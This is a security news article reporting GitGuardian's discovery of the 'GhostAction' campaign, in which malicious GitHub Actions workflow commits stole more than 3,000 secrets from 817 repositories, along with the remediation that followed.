Hundreds of GitHub users and repositories have been hit by another supply chain attack, in which threat actors have already stolen more than 3000 secrets, according to GitGuardian.
The security vendor first noticed suspicious activity related to a GitHub repository associated with the FastUUID project, on September 5.
A compromised maintainer had pushed a malicious commit three days earlier. This contained a GitHub action workflow file designed to steal secrets, specifically a PyPI token.
“While this token should have allowed the actor to compromise the FastUUID package on PyPI, we found no evidence of malicious package releases during the compromise window,” GitGuardian explained.
“The attacker’s inaction during the three days following the initial compromise suggested FastUUID was not the primary target. Our investigation revealed a much larger operation.”
Read more on GitHub threats: Nearly 13 Million Secrets Spilled Via Public GitHub Repositories.
Digging deeper, the vendor discovered hundreds of similar malicious commits across multiple repositories, all tied back to the same compromised user and exfiltration endpoint. In total, it found that 327 users across 817 repositories had fallen victim to the campaign, leading to the exfiltration of 3325 secrets. Gitguardian dubbed this campaign “GhostAction.”
DockerHub credentials, GitHub tokens and npm tokens were the most common type of secrets stolen in the campaign.
Remediation Efforts Kick In
GitGuardian was quick to inform the affected users. It claimed 100 of the impacted repositories had already reverted the malicious changes made by the threat actor, leaving hundreds more still at risk.
“This disclosure prompted rapid remediation efforts. Initial discussions with affected developers confirmed that attackers were actively exploiting the stolen secrets, including AWS access keys and database credentials,” it explained.
“Several companies were found to have their entire SDK portfolio compromised, with malicious workflows affecting their Python, Rust, JavaScript and Go repositories simultaneously.”
GitGuardian notified the GitHub, npm and PyPI security teams on September 5 about the campaign, warning that nine npm and 15 PyPI packages are “at risk of compromise in the next hours or days.”
The campaign is not thought to be connected to the recent “S1ngularity” attack campaign, with no crossover in victims.
